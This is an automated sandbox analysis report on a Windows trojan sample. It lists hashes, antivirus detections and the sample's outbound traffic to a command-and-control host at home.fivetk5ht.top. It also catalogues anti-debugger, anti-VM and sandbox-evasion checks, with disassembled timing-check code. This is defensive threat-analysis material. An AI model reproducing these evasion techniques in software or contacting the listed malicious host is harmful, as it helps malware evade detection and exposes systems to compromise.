Windows Analysis Report
iuO4kwUi17.exe

Overview

General Information

Sample name: iuO4kwUi17.exe (renamed because original name is a hash value)
Original sample name: a7e8135cfe118aa459fe0483617fd64e.exe
Analysis ID: 1578958
MD5: a7e8135cfe118aa459fe0483617fd64e
SHA1: 03509b6b6a9e158bc7a6ae89f21f0057e5115ecd
SHA256: 97f25927cea71bfcdac5e7755682aea36429ea3eb3accfc64ecdfc9db1d8006b
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Entry point lies outside standard sections
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files

Classification

  • System is w10x64
  • iuO4kwUi17.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\iuO4kwUi17.exe" MD5: A7E8135CFE118AA459FE0483617FD64E)
    • WerFault.exe (PID: 3888 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 1152 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: iuO4kwUi17.exe | Avira: detected
Source: iuO4kwUi17.exe | ReversingLabs: Detection: 47%
Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: iuO4kwUi17.exe | Joe Sandbox ML: detected
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_48a37bd7-9
Source: iuO4kwUi17.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 Host: httpbin.org Accept: */*
Source: global traffic | HTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1 Host: home.fivetk5ht.top Accept: */* Content-Type: application/json Content-Length: 443893
Source: global traffic | HTTP traffic detected: GET /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1 Host: home.fivetk5ht.top Accept: */*
Source: Joe Sandbox View | IP Address: 185.121.15.192
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fivetk5ht.top
Source: unknown | HTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1 Host: home.fivetk5ht.top Accept: */* Content-Type: application/json Content-Length: 443893
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.css
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.jpg
Source: iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17
Source: iuO4kwUi17.exe, 00000000.00000002.1918748214.0000000001BEE000.00000004.00000020.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp, iuO4kwUi17.exe, 00000000.00000002.1918748214.0000000001C6E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
Source: iuO4kwUi17.exe, 00000000.00000002.1918748214.0000000001BEE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv173457985135a1
Source: iuO4kwUi17.exe, 00000000.00000002.1918748214.0000000001BEE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798514fd4
Source: iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: Amcache.hve.5.dr | String found in binary or memory: http://upx.sf.net
Source: iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703

System Summary

Source: iuO4kwUi17.exe | Static PE information: section name:
Source: iuO4kwUi17.exe | Static PE information: section name: .idata
Source: iuO4kwUi17.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 1152
Source: iuO4kwUi17.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: iuO4kwUi17.exe | Static PE information: Section: lvvpaogd ZLIB complexity 0.994559543444694
Source: iuO4kwUi17.exe | Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine | Classification label: mal100.troj.evad.winEXE@2/5@10/2
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7280
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\19a312e5-6cbf-4b76-89ef-d1ab7c8c5f31
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: iuO4kwUi17.exe | ReversingLabs: Detection: 47%
Source: iuO4kwUi17.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown | Process created: C:\Users\user\Desktop\iuO4kwUi17.exe "C:\Users\user\Desktop\iuO4kwUi17.exe"
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 1152
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Section loaded: windowscodecs.dll
Source: iuO4kwUi17.exe | Static file information: File size 4480000 > 1048576
Source: iuO4kwUi17.exe | Static PE information: Raw size of is bigger than: 0x100000 < 0x284c00
Source: iuO4kwUi17.exe | Static PE information: Raw size of lvvpaogd is bigger than: 0x100000 < 0x1bd400

Data Obfuscation

Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Unpacked PE file: 0.2.iuO4kwUi17.exe.7d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lvvpaogd:EW;aoltjaey:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lvvpaogd:EW;aoltjaey:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: iuO4kwUi17.exe | Static PE information: real checksum: 0x45447e should be: 0x4488c6
Source: iuO4kwUi17.exe | Static PE information: section name:
Source: iuO4kwUi17.exe | Static PE information: section name: .idata
Source: iuO4kwUi17.exe | Static PE information: section name:
Source: iuO4kwUi17.exe | Static PE information: section name: lvvpaogd
Source: iuO4kwUi17.exe | Static PE information: section name: aoltjaey
Source: iuO4kwUi17.exe | Static PE information: section name: .taggant
Source: iuO4kwUi17.exe | Static PE information: section name: lvvpaogd entropy: 7.956161259145636

Boot Survival

Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\iuO4kwUi17.exe | Window searched: window name: Filemonclass
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\iuO4kwUi17.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\iuO4kwUi17.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: PROCMON.EXE
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: X64DBG.EXE
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WINDBG.EXE
Source: iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10DC0C3 second address: 10DC0C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10DC0C9 second address: 10DC0CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E13DE second address: 10E13E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E13E2 second address: 10E13E8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10DEF8E second address: 10DEF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10DEF92 second address: 10DEF96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E158D second address: 10E1591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E1591 second address: 10E15A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F930851C676h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E15A3 second address: 10E15A9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E3511 second address: 10E3515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E3515 second address: 10E3594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 mov bx, ax 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F9308CAD928h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 jnc 00007F9308CAD929h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F9308CAD928h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 0000001Bh 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 mov dword ptr [ebp+122D1B94h], edi 0x0000004f mov ebx, 143D1500h 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F9308CAD934h 0x0000005e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E3594 second address: 10E359A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E26AA second address: 10E26AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E65E6 second address: 10E65EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E770B second address: 10E7723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD934h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E85E8 second address: 10E85EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E85EC second address: 10E8653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007F9308CAD92Bh 0x0000000d nop 0x0000000e sub bx, 570Eh 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F9308CAD928h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov ebx, ecx 0x00000031 sub di, 5708h 0x00000036 push 00000000h 0x00000038 mov edi, ebx 0x0000003a xchg eax, esi 0x0000003b jmp 00007F9308CAD92Bh 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F9308CAD92Eh 0x00000049 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E8653 second address: 10E866F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C680h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F930851C67Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E46BC second address: 10E46C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E577D second address: 10E5811 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F930851C676h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d or di, 6AF9h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 and edi, dword ptr [ebp+122D27C9h] 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007F930851C678h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 00000019h 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 mov eax, dword ptr [ebp+122D164Dh] 0x00000046 mov dword ptr [ebp+122D3045h], ebx 0x0000004c push FFFFFFFFh 0x0000004e call 00007F930851C67Ch 0x00000053 mov ebx, dword ptr [ebp+122D360Ch] 0x00000059 pop ebx 0x0000005a nop 0x0000005b jbe 00007F930851C685h 0x00000061 jmp 00007F930851C67Fh 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007F930851C683h 0x0000006e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E46C3 second address: 10E46C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E5811 second address: 10E5817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E3718 second address: 10E37B2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9308CAD92Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, ebx 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F9308CAD928h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e mov dword ptr [ebp+12485167h], ecx 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b jmp 00007F9308CAD931h 0x00000040 mov eax, dword ptr [ebp+122D02F1h] 0x00000046 add bx, 1061h 0x0000004b xor dword ptr [ebp+122D3271h], esi 0x00000051 push FFFFFFFFh 0x00000053 stc 0x00000054 sbb edi, 1E135499h 0x0000005a nop 0x0000005b jbe 00007F9308CAD93Eh 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push ecx 0x00000065 jno 00007F9308CAD926h 0x0000006b pop ecx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E8817 second address: 10E8829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F930851C67Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E8829 second address: 10E882D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10EA596 second address: 10EA5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007F930851C676h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10EA5A2 second address: 10EA5A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10EA5A6 second address: 10EA627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a and di, 2D12h 0x0000000f and ebx, dword ptr [ebp+122D34ADh] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F930851C678h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 mov di, si 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007F930851C678h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 00000017h 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 mov di, A54Dh 0x00000054 mov ebx, dword ptr [ebp+124532CCh] 0x0000005a xchg eax, esi 0x0000005b jl 00007F930851C684h 0x00000061 jmp 00007F930851C67Eh 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E971A second address: 10E971E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10EA627 second address: 10EA62B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10EA62B second address: 10EA635 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9308CAD926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10EA635 second address: 10EA63F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F930851C676h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10EC612 second address: 10EC618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1084810 second address: 1084814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10939FE second address: 1093A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jno 00007F9308CAD926h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9308CAD934h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1093A21 second address: 1093A25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10F6A40 second address: 10F6A44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10F6A44 second address: 10F6A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
